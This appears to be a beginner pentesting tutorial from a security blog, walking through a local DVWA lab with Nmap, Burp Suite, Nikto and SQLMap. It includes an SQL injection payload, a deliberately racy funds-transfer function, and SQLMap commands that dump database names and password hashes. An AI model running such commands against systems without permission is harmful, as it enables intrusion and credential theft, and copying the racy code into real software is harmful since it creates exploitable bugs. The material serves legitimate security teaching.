Security 101

Your First Pentest: A Practical Intro Using Free Tools

May 2026

No paid accounts. No vendor lock-in. Just a terminal, a local lab, and the same tools professional pentesters use every day.

8-bit pixel art of a hacker terminal scene

What Is Pentesting, Actually?

Penetration testing — pentesting — is the practice of attacking your own systems the way a malicious actor would, before they get the chance to. The canonical reference for what to look for is the OWASP Top 10, but the mindset matters more than any checklist: assume something is broken, then prove it.

Most introductions to pentesting lead you straight to a product signup. This one does not. Everything below is free and open source, runs locally on your laptop, and is used by real security engineers. Once you are comfortable here, the natural next step is wiring these checks into CI — see Continuous Pentesting in CI for the automated, gated version of this same workflow.

Never pentest systems you do not own or have explicit written permission to test. Even well-intentioned scanning of a live system you do not control is illegal in most jurisdictions. Set up a local lab instead — it takes about ten minutes.

The Lab — DVWA on Docker

DVWA (Damn Vulnerable Web Application) is a PHP/MySQL app deliberately riddled with common vulnerabilities. It is the closest thing to a standardized training ground the web security community has.

docker pull vulnerables/web-dvwa
docker run -d -p 80:80 vulnerables/web-dvwa

# Open http://localhost, log in with: admin / password
# Click "Setup / Reset DB" — you now have a legal target.

Vulnerability Classes to Know

Before you touch a tool, understand what you are looking for. The OWASP Top 10 is the canonical list. These five show up first:

SQL Injection

Unsanitized input hits a database query

Example: ' OR '1'='1 in a login form

XSS

Attacker script runs in another user's browser

Example: Stored comment that executes JavaScript

IDOR

Changing an ID in a URL exposes another user's data

Example: /api/orders/1337 → not your order

TOCTOU Race

State changes between a check and its use

Example: Balance check passes, two withdrawals execute

Broken Auth

Weak session tokens, missing rate limits

Example: Brute-forcing a 4-digit PIN with no lockout

Spotlight — The TOCTOU Race

TOCTOU (Time-Of-Check vs Time-Of-Use) is subtle and worth understanding deeply. The code looks correct in review:

// Looks safe. Isn't.
async function transfer(userId, amount) {
  const balance = await db.getBalance(userId);
  if (balance < amount) throw new Error("Insufficient funds");
  await db.deductBalance(userId, amount);   // race window lives here
  await db.creditRecipient(amount);
}

Send two concurrent requests before deductBalance completes on either, and the check passes twice. A pentester would catch this with a parallel-request harness. A code reviewer often will not.

The Free Tool Stack

Nmap

Port and service discovery

brew install nmap | sudo apt install nmap

Burp Suite Community

HTTP interception proxy

Download from portswigger.net/burp/communitydownload

SQLMap

Automated SQL injection

pip install sqlmap | sudo apt install sqlmap

Nikto

Web server misconfiguration scanner

sudo apt install nikto | brew install nikto

Recon — Nmap

Nmap is the first tool most pentesters reach for. It maps open ports and running services on a target. Output tells you exactly what versions are exposed — your attack surface map.

nmap -sV -sC localhost

# -sV  →  probe ports for service/version info
# -sC  →  run default safe scripts

Intercept — Burp Suite Community

Burp Suite Community Edition is free and is the industry-standard HTTP proxy for web pentesting. It sits between your browser and the server and lets you inspect, modify, and replay every request.

1. Start Burp → Proxy → Intercept tab
2. Configure your browser to use 127.0.0.1:8080 as its proxy
3. Browse to DVWA — every request appears in Burp
4. Right-click any request → Send to Repeater → modify → resend

Exploit — SQLMap

Once Burp shows you a parameter that might be injectable, SQLMap automates the proof. This is how you move from “possible injection point” to “I have the data.”

sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit" \
  --cookie="security=low; PHPSESSID=<your_session_id>" \
  --dbs

A Full Workflow, Start to Finish

Here is how a beginner session against DVWA actually flows. Start to finish: under 20 minutes, zero spend.

1.nmap -sV localhost → Apache 2.4, PHP 7.2 on port 80
2.nikto -h http://localhost → config file exposure, default creds
3.Burp → intercept GET /vulnerabilities/sqli/?id=1 → send to Repeater
4.Change id=1 to id=1' → MySQL error in response = injectable
5.sqlmap -u "..." --dbs → dumps database names
6.sqlmap -u "..." -D dvwa -T users --dump → retrieves password hashes

What to Learn Next

Metasploit Framework

Free exploit framework for network-level vulnerabilities

OWASP ZAP

Free Burp alternative with stronger automation support

Gobuster / ffuf

Directory and endpoint brute-forcing to find hidden attack surface

CTFs (HackTheBox, PicoCTF)

Beginner-friendly scored challenges in legal lab environments

The Security Mindset

Tools are just tools. The actual skill is thinking adversarially: what assumption does this code make, and what happens when that assumption is wrong? A balance check assumes the balance will not change between read and write. A login form assumes the input is a string, not a SQL fragment. An API assumes the caller owns the resource ID they are passing.

Find the assumption. Break it. That is pentesting.

All tools mentioned are free and open source. DVWA is for local use only — never deploy it to a public server.

← Back to Home